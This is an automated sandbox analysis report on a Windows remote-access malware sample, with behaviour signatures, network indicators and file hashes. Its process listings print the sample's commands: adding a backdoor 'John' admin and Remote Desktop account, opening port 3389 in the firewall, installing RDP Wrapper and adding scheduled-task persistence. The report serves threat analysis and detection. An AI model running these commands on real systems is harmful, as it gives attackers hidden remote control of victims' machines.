Analysis Overview
SHA256
24b0e23df17c77d44882a2e25ecbd4d3b07015af5d44cb325679a370b8304614
Threat Level: Known bad
The file 24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe was found to be: Known bad.
Malicious Activity Summary
RMS
Suspicious use of NtCreateUserProcessOtherParentProcess
Grants admin privileges
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
Loads dropped DLL
Modifies WinLogon
Looks up external IP address via web service
AutoIT Executable
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-14 23:14
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-14 23:14
Reported
2022-05-14 23:16
Platform
win7-20220414-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
RMS
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\RDPWinst.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe
"C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\SysWOW64\net.exe
net user John 12345 /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\system32\taskeng.exe
taskeng.exe {A0E3B6BA-8688-4493-ADB0-3E03F6A8A06F} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
Network
| Country | Destination | Domain | Proto |
| RU | 45.144.30.30:5655 | tcp | |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| RU | 45.144.30.58:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
Files
memory/1788-54-0x0000000075DB1000-0x0000000075DB3000-memory.dmp
memory/948-55-0x0000000000000000-mapping.dmp
memory/1188-56-0x0000000000000000-mapping.dmp
\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1648-58-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\settings.dat
| MD5 | 483fc2e7373a9ee36cc444fca67a32a8 |
| SHA1 | c2fe2355683b670622a8e00784bec5056291e494 |
| SHA256 | 2ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d |
| SHA512 | e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4 |
memory/1656-65-0x0000000000000000-mapping.dmp
memory/1592-66-0x0000000000000000-mapping.dmp
memory/1468-67-0x0000000000000000-mapping.dmp
memory/1548-68-0x0000000000000000-mapping.dmp
memory/1876-69-0x0000000000000000-mapping.dmp
memory/1116-70-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1784-72-0x0000000000000000-mapping.dmp
memory/1772-73-0x0000000000000000-mapping.dmp
memory/1424-74-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1700-76-0x0000000000000000-mapping.dmp
memory/1904-77-0x0000000000000000-mapping.dmp
memory/920-78-0x0000000000000000-mapping.dmp
memory/1284-79-0x0000000000000000-mapping.dmp
memory/744-80-0x0000000000000000-mapping.dmp
memory/284-81-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1532-83-0x0000000000000000-mapping.dmp
memory/2024-84-0x0000000000000000-mapping.dmp
memory/948-85-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2004-87-0x0000000000000000-mapping.dmp
memory/1956-88-0x0000000000000000-mapping.dmp
memory/1996-89-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
memory/1864-92-0x0000000000000000-mapping.dmp
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1540-95-0x0000000000000000-mapping.dmp
memory/1540-96-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
memory/2004-97-0x0000000000000000-mapping.dmp
C:\Programdata\Install\del.bat
| MD5 | 49a9fec3ba20596a39e2bfae59ff4b3c |
| SHA1 | b9cc7369a94831b912ed85532d7cc99f32c82040 |
| SHA256 | 3a85f338cd09aefe830c7b8bac225e3d8d847b7184ecfb625ad7f46492dba681 |
| SHA512 | e5174539967fbc5dd1a4cec7d7a868c45ff58906fd2e580ba49a82b0ff6fabfb0564678d3aca37e86f9124776d7aba6c65fa0f72219e0474adcb9dc8e7484bea |
memory/1116-99-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1236-100-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1372-103-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-14 23:14
Reported
2022-05-14 23:16
Platform
win10v2004-20220414-en
Max time kernel
147s
Max time network
147s
Command Line
Signatures
RMS
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2188 created 3212 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\Windows Tasks Service\winserv.exe |
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | \??\c:\program files\rdp wrapper\rdpwrap.txt | C:\Windows\System32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\MIME\Database | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe
"C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net.exe
net user John 12345 /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
Network
| Country | Destination | Domain | Proto |
| RU | 45.144.30.30:5655 | tcp | |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| RU | 45.144.30.58:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| GB | 51.105.71.137:443 | tcp | |
| US | 67.24.169.254:80 | tcp | |
| US | 67.24.169.254:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 67.24.169.254:80 | tcp | |
| US | 204.79.197.203:80 | tcp |
Files
memory/2688-130-0x0000000000000000-mapping.dmp
memory/3448-131-0x0000000000000000-mapping.dmp
